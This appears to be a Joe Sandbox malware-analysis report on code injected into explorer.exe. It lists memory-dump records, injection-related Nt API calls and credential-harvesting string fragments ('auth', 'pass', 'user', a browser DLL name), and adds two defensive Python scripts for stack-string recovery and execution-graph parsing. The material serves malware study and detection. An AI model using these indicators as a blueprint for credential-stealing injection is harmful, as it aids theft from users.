                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                      • API String ID: 0-3434893486
                                                                                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                      • Instruction ID: 462bf0394b430058ce2e2fa025bf0300a914096d40bc5af1651955489305314e
                                                                                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                      • Instruction Fuzzy Hash: 5A31F271518B885FD75AEF38C4886DAB7D4FB84300F60491EE49BD7262EA30A909CA43
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                      • API String ID: 0-3434893486
                                                                                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                      • Instruction ID: 9992b093b6a7e07127c5b79e6dca420cfa9011d104fba642dafce13b91947eeb
                                                                                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                      • Instruction Fuzzy Hash: 7F31B271518B486FD76ADF24C4886DAB7D4FB94300F60491EE49BD7262EA34E9058A43
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                      • API String ID: 0-3136806129
                                                                                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                      • Instruction ID: 12f79a2020f61a17a953c4fad2d22aec26c0321eed9d341fa85e521aabe07369
                                                                                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                      • Instruction Fuzzy Hash: 03317270118B184FC795EF6894987AAB7E1FB94300FA44A2D944ADB266DF30C905CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                      • API String ID: 0-3136806129
                                                                                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                      • Instruction ID: f6a5b6048f089a5dec7c72de43c28ec9c840b13dd964d9af3e4818692ab6cf49
                                                                                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                      • Instruction Fuzzy Hash: 20317470118B184FC795EF6894987AAB7E1FF94300FA44A3D944ADB266DF30C905CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 0-319646191
                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction ID: 6456afa72e95d0e3ecbac1a31916d06ab847eb8de2e30a0415d0c30cf8ab3457
                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction Fuzzy Hash: 1031F130610A5C8BDB45EFB8C8887EDB7E1FB58214F40062AD44EE7251DE788A44C79A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 0-319646191
                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction ID: 0b98b11259a3b8e89157fe7a5b3327574efc63be0d10b70ebcac74d7cb48a9b8
                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction Fuzzy Hash: 8B210630A10A5C8BCB45EFB8C8487EDBBE1FF58204F50061AD45AE7261DF748A04CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$l$l$t
                                                                                                                      • API String ID: 0-168566397
                                                                                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                      • Instruction ID: 624af3248e5601e759ff205703a41b7c34eafa35e470fac8497d3368a0bb3f65
                                                                                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                      • Instruction Fuzzy Hash: 11217E70A24A0D9FDB44EFB8D0487ADBAF1FB18300F60462ED009E3611D77499558B94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$l$l$t
                                                                                                                      • API String ID: 0-168566397
                                                                                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                      • Instruction ID: 682e127468e34b60bbcccdbe801baf35b741921cb06f5b33ab415541f1ca81e9
                                                                                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                      • Instruction Fuzzy Hash: 2F218D70A24A0D9FDB48EFB8D4487EDBBF1FB18300F604A2ED009E3611DB7899558B94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: auth$logi$pass$user
                                                                                                                      • API String ID: 0-2393853802
                                                                                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                      • Instruction ID: 7d285e26d09b43b735ad51fca5ced63a49f9425dd6f436c71cd03a79ebc649e3
                                                                                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                      • Instruction Fuzzy Hash: 7C21F071614B0C8BCB45DFA998947EEB7E1EFC8310F00461AD40AEB219D7B0ED008BC2
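The String IDs in the records above are 3- and 4-character fragments (`vers`, `ion.`, `dll`; `kern`, `el32`, `.dll`; `auth`, `logi`, `pass`, `user`) rather than whole strings, and the plugin lists them sorted, so their original order is lost. That is the signature a disassembler produces when a string is assembled in the stack frame from 32-bit immediate stores instead of being stored whole in the image. The report does not say how this sample builds its strings, so that origin is an assumption here. The scanner below is an added example (not Joe Sandbox or FormBook code) that recovers such strings from raw x86 code by reading the immediate stores and ordering them by stack slot, not by the order in which they appear; the byte buffer is hand-assembled for illustration and is not taken from the sample.

```python
import string
import struct

# Bytes accepted inside a recovered string (space kept, other whitespace dropped).
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def find_stack_writes(code: bytes):
    """Return (offset, length, disp, data) for each ebp-relative immediate store.

    This is a byte-pattern scan, not a disassembler: the same bytes inside an
    unrelated instruction would also match, so callers must tolerate noise.
    """
    writes = []
    i, n = 0, len(code)
    while i < n:
        # C7 45 disp8 imm32  ->  mov dword ptr [ebp+disp8], imm32
        if code[i] == 0xC7 and i + 7 <= n and code[i + 1] == 0x45:
            disp = struct.unpack_from("<b", code, i + 2)[0]
            writes.append((i, 7, disp, code[i + 3:i + 7]))
            i += 7
        # C6 45 disp8 imm8   ->  mov byte ptr [ebp+disp8], imm8
        elif code[i] == 0xC6 and i + 4 <= n and code[i + 1] == 0x45:
            disp = struct.unpack_from("<b", code, i + 2)[0]
            writes.append((i, 4, disp, code[i + 3:i + 4]))
            i += 4
        else:
            i += 1
    return writes


def group_writes(writes, max_gap=12):
    """Split the stores into frames: a gap of more than max_gap code bytes
    between two stores is treated as a new function (different [ebp-x] slots)."""
    groups, current, prev_end = [], [], None
    for off, length, disp, data in writes:
        if prev_end is not None and off - prev_end > max_gap:
            groups.append(current)
            current = []
        current.append((disp, data))
        prev_end = off + length
    if current:
        groups.append(current)
    return groups


def assemble(group):
    """Order the stores by frame displacement and join runs of adjacent slots."""
    segments, buf, next_disp = [], b"", None
    for disp, data in sorted(group):
        if next_disp is not None and disp != next_disp:
            segments.append(buf)
            buf = b""
        buf += data
        next_disp = disp + len(data)
    if buf:
        segments.append(buf)
    return segments


def recover_stack_strings(code: bytes, min_len=4):
    found = []
    for group in group_writes(find_stack_writes(code)):
        for seg in assemble(group):
            for piece in seg.split(b"\x00"):
                if len(piece) >= min_len and all(b in PRINTABLE for b in piece):
                    found.append(piece.decode("ascii"))
    return found


# Constructed sample: two hand-assembled 32-bit functions. The stores in the
# first are deliberately out of order, as they are in compiler output and as
# the sorted String IDs in the report are.
SAMPLE = (
    b"\xC7\x45\xF4ion."           # mov dword ptr [ebp-0x0C], 'ion.'
    b"\xC7\x45\xF0vers"           # mov dword ptr [ebp-0x10], 'vers'
    b"\xC7\x45\xF8dll\x00"        # mov dword ptr [ebp-0x08], 'dll\0'
    b"\x8B\x45\x08\x50"           # mov eax,[ebp+8]; push eax   (filler)
    b"\xE8\x00\x00\x00\x00"       # call rel32                  (filler)
    b"\x83\xC4\x04\xC9\xC3"       # add esp,4; leave; ret        (filler)
    b"\xCC\xCC\xCC\xCC"           # int3 padding between functions
    b"\xC7\x45\xF0kern"           # mov dword ptr [ebp-0x10], 'kern'
    b"\xC7\x45\xF4el32"           # mov dword ptr [ebp-0x0C], 'el32'
    b"\xC7\x45\xF8.dll"           # mov dword ptr [ebp-0x08], '.dll'
    b"\xC6\x45\xFC\x00"           # mov byte  ptr [ebp-0x04], 0
)

if __name__ == "__main__":
    print(recover_stack_strings(SAMPLE))
```

Ordering by displacement is what makes the second function recoverable: its terminator is a separate byte store, and in real code the dword stores are often interleaved with other instructions, so reassembling in scan order would split or scramble the string. For a real dump, run the scanner over each executable region of the memory dump listed in the Source File field and expect false positives from the pattern match; a disassembler-backed version keyed on `mov [esp+disp], imm32` and `[ebp+disp32]` forms as well would catch the remaining cases.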

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.8%
                                                                                                                      Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:404
                                                                                                                      Total number of Limit Nodes:57
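Joe Sandbox renders the execution graph as an interactive diagram; in this text capture it survives only as a flat token stream of node ids, hex function addresses, API labels and `src->dst` edges. The parser below is an added example (not Joe Sandbox code) that rebuilds the graph from that stream and answers the question an analyst usually brings to it, namely which functions lie on a path to a given API such as NtAllocateVirtualMemory. The grammar is inferred from the dump, not documented: it assumes a node is a decimal id immediately followed by a hex address, and that everything up to the next node or edge is that node's label. The input is two excerpts copied from the dump that follows.

```python
import re
from collections import defaultdict

# Two excerpts copied verbatim from the execution_graph token stream in this report.
GRAPH_EXCERPT = (
    "execution_graph 102160 4c22ad0 LdrInitializeThunk 102164 2969040 "
    "102169 296bd00 102164->102169 102166 296915c 102167 29690e0 Sleep "
    "102168 296907b 102167->102168 102168->102166 102168->102167 "
    "102172 296a500 102169->102172 102171 296bd2d 102171->102168 "
    "102173 296a51c NtAllocateVirtualMemory 102172->102173 102175 296af20 "
    "102172->102175 102173->102171 102176 296af30 102175->102176 "
    "102176->102173 "
    "102205 2959059 102206 2964a40 7 API calls 102205->102206"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
HEX_ADDR = re.compile(r"^[0-9a-f]{5,8}$")


def parse_execution_graph(text):
    """Rebuild (labels, edges) from the flattened graph text.

    Assumed format: a node is a decimal id followed directly by a hex address;
    label words follow until the next node or edge. A decimal word inside a
    label ("7 API calls") is not taken for an id because the word after it is
    not an address.
    """
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    labels = {}                   # id -> (address, [label words])
    edges = defaultdict(list)     # id -> [successor ids]
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = tok
            labels[current] = (tokens[i + 1], [])
            i += 2
        else:
            if current is not None:
                labels[current][1].append(tok)
            i += 1
    return labels, dict(edges)


def api_counts(labels):
    """Count API names in node labels. An API name is taken to be a capitalised
    alphabetic word; 'API' in the summarised '<n> API calls' labels is skipped."""
    counts = defaultdict(int)
    for _, words in labels.values():
        for w in words:
            if w.isalpha() and w[0].isupper() and w != "API":
                counts[w] += 1
    return dict(counts)


def nodes_calling(labels, api):
    return {nid for nid, (_, words) in labels.items() if api in words}


def callers_of(labels, edges, api):
    """Every node from which a node labelled with `api` is reachable
    (reverse breadth-first search over the edge list)."""
    preds = defaultdict(set)
    for src, dsts in edges.items():
        for dst in dsts:
            preds[dst].add(src)
    frontier = list(nodes_calling(labels, api))
    seen = set(frontier)
    while frontier:
        node = frontier.pop()
        for p in preds[node]:
            if p not in seen:
                seen.add(p)
                frontier.append(p)
    return seen


if __name__ == "__main__":
    labels, edges = parse_execution_graph(GRAPH_EXCERPT)
    print(api_counts(labels))
    for nid in sorted(callers_of(labels, edges, "NtAllocateVirtualMemory")):
        addr, words = labels[nid]
        print(nid, addr, " ".join(words))
```

On the excerpt, `callers_of` reports that node 102164 (function 2969040) reaches the NtAllocateVirtualMemory node through 102169 and 102172, while the Sleep loop (102167/102168) is downstream of the allocation and not among its callers. Run over the full stream, the same query for NtCreateFile, NtReadFile and LookupPrivilegeValueW gives the handful of function addresses worth opening first in the memory dump.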
                                                                                                                      execution_graph 102160 4c22ad0 LdrInitializeThunk 102164 2969040 102169 296bd00 102164->102169 102166 296915c 102167 29690e0 Sleep 102168 296907b 102167->102168 102168->102166 102168->102167 102172 296a500 102169->102172 102171 296bd2d 102171->102168 102173 296a51c NtAllocateVirtualMemory 102172->102173 102175 296af20 102172->102175 102173->102171 102176 296af30 102175->102176 102176->102173 102177 296f09d 102180 296b990 102177->102180 102179 296f0a2 102181 296b9b6 102180->102181 102186 2959d30 102181->102186 102183 296b9c2 102184 296b9e6 102183->102184 102192 2958f30 102183->102192 102184->102179 102222 2959c80 102186->102222 102188 2959d44 102188->102183 102189 2959d3d 102189->102188 102229 295f170 102189->102229 102196 2958f57 102192->102196 102194 2958ffc 102476 295f400 102194->102476 102218 29590f2 102196->102218 102466 295f370 102196->102466 102197 2959006 102198 296bf50 RtlAllocateHeap 102197->102198 102197->102218 102199 295902a 102198->102199 102200 296bf50 RtlAllocateHeap 102199->102200 102201 295903b 102200->102201 102202 296bf50 RtlAllocateHeap 102201->102202 102203 295904c 102202->102203 102486 295ca80 102203->102486 102205 2959059 102206 2964a40 7 API calls 102205->102206 102207 2959066 102206->102207 102208 2964a40 7 API calls 102207->102208 102209 2959077 102208->102209 102210 29590a5 102209->102210 102211 2959084 102209->102211 102212 2964a40 7 API calls 102210->102212 102492 295d610 102211->102492 102214 29590c1 102212->102214 102221 29590e9 102214->102221 102513 295d6b0 NtClose LdrInitializeThunk LdrInitializeThunk 102214->102513 102215 295908b 102496 2958d00 102215->102496 102216 2958d00 22 API calls 102216->102218 102218->102184 102221->102216 102224 2959c93 102222->102224 102223 2959ca6 102223->102189 102224->102223 102237 296b270 102224->102237 102226 2959ce3 102226->102223 102248 2959aa0 102226->102248 102228 2959d03 
102228->102189 102230 295f189 102229->102230 102231 2959d55 102230->102231 102458 296a790 102230->102458 102231->102183 102233 295f1c2 102236 295f1ed 102233->102236 102461 296a220 102233->102461 102235 296a450 NtClose 102235->102231 102236->102235 102238 296b289 102237->102238 102254 2964a40 102238->102254 102240 296b2a1 102241 296b2aa 102240->102241 102283 296b0b0 102240->102283 102241->102226 102243 296b2be 102243->102241 102297 2969ec0 102243->102297 102437 2957ea0 102248->102437 102250 2959ac1 102250->102228 102251 2959aba 102251->102250 102450 2958160 102251->102450 102255 2964a54 102254->102255 102256 2964b63 102254->102256 102255->102256 102304 296a320 102255->102304 102256->102240 102258 2964ba7 102259 296bd80 RtlFreeHeap 102258->102259 102263 2964bb3 102259->102263 102260 2964d39 102262 296a450 NtClose 102260->102262 102261 2964d4f 102353 2964780 NtReadFile NtClose 102261->102353 102264 2964d40 102262->102264 102263->102256 102263->102260 102263->102261 102267 2964c42 102263->102267 102264->102240 102266 2964d62 102266->102240 102268 2964ca9 102267->102268 102269 2964c51 102267->102269 102268->102260 102275 2964cbc 102268->102275 102270 2964c56 102269->102270 102271 2964c6a 102269->102271 102349 2964640 NtClose LdrInitializeThunk LdrInitializeThunk 102270->102349 102273 2964c87 102271->102273 102274 2964c6f 102271->102274 102273->102264 102317 2964400 102273->102317 102307 29646e0 102274->102307 102350 296a450 102275->102350 102276 2964c60 102276->102240 102278 2964c7d 102278->102240 102281 2964c9f 102281->102240 102282 2964d28 102282->102240 102284 296b0c1 102283->102284 102285 296b0d3 102284->102285 102286 296bd00 NtAllocateVirtualMemory 102284->102286 102285->102243 102287 296b0f4 102286->102287 102369 2964060 102287->102369 102289 296b140 102289->102243 102290 296b117 102290->102289 102291 2964060 2 API calls 102290->102291 102293 296b139 102291->102293 102293->102289 102401 2965380 102293->102401 102294 296b1ca 102411 2969e80 102294->102411 102298 

Control-flow Graph
APIs
• NtQueryInformationProcess.NTDLL ref: 04AAA19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: a0be38c689833dd56a640d7450e88dd8fb8e897e92837c1c8e5e805d182e77e5
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: 88F14174918A4C8FDBA5EF68C894AEEB7E1FF98304F40462AD44ED7650DF34A541CB41

Control-flow Graph: 4aa9baf (calls NtCreateSection, NtMapViewOfSection, NtClose)
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: a4bcfed2a5fb6194d65dedbd05ef57218ba2b3571b9f696e28f9da53d99f376b
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: 7261837051CB488FDB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35E441CB86

Control-flow Graph: 4aa9bb2 (calls NtCreateSection, NtMapViewOfSection, NtClose)
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: e9bafb42bba6fa698b6afe82cef2db691d15d3d66e465da696ba39206cf905a8
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: 4B5170B0618B088FD758DF18D8956AABBE4FF88314F50062EE58EC3651DF35E481CB86

Control-flow Graph
APIs
• NtQueryInformationProcess.NTDLL ref: 04AAA19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 48e040c524d90cd8ad422171408513dd93390ca8bf5bbbae982aa27e9e6d1187
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: 14512E70914A8C8FEBA9EF68C8946EEB7F4FB98305F40462ED44AD7250DF309645CB41

Control-flow Graph: 296a320 (calls 296af20, NtCreateFile)
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,02964BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02964BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0296A36D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 5723c9e5332e6627e891934dded7fd402faa2be69655ec4e134fa3c352e65f47
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: F8F0B2B2200208AFCB08CF88DC94EEB77EDAF8C754F158248BA0D97240C630E8118BA4
APIs
• NtReadFile.NTDLL(02964D62,5EB65239,FFFFFFFF,02964A21,?,?,02964D62,?,02964A21,FFFFFFFF,5EB65239,02964D62,?,00000000), ref: 0296A415
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: a99d09a9d41fc1d4f9c9e8c730a7df0e965b5723ac510e51430ef67a693cb6b4
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: AFF0A4B2200208AFCB14DF89DC94EEB77ADAF8C754F158258BA1DA7241D630E8118BA0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02952D11,00002000,00003000,00000004), ref: 0296A539
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: 9c679a19cd3e6646642d52bc9acd5b85b39c56eb3bfe594bb59ac0127874600f
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: 8FF015B2200208AFCB14DF89DC80EAB77ADAF88754F118158BE08A7241C630F810CBA0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02952D11,00002000,00003000,00000004), ref: 0296A539
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 4e0d8033807141b7815a619b56b0a309f13dcba26b20c43bcee8e4998eb50e7a
• Instruction ID: 488e37ce243f0b36aaa267bc104b41fb1166a0273ac7528304a17aa783edba8f
• Opcode Fuzzy Hash: 4e0d8033807141b7815a619b56b0a309f13dcba26b20c43bcee8e4998eb50e7a
• Instruction Fuzzy Hash: 36F030B62001496BCB15DF98DC84CA777A9BF88214B15865DFD489B202C634D815CBA0
APIs
• NtClose.NTDLL(02964D40,?,?,02964D40,00000000,FFFFFFFF), ref: 0296A475
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
• Instruction ID: 7905ad398db8824259c1c6612c5bf191536739aca82fd2e80e03b620c56ce229
• Opcode Fuzzy Hash: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
• Instruction Fuzzy Hash: 5EE0C272200204AFDB20DFA8DC88FEB7B68EF44350F144569FA0CEB282C531E6008B90
APIs
• NtClose.NTDLL(02964D40,?,?,02964D40,00000000,FFFFFFFF), ref: 0296A475
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                      • Instruction ID: 50590e41779e82fd2c1366b31cc1270279e0ea9770adcebd8d582ec60056cef1
                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                      • Instruction Fuzzy Hash: 89D012762002146BD710EBD8DC45EA7779DEF44750F154455BA185B241C570F90086E0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
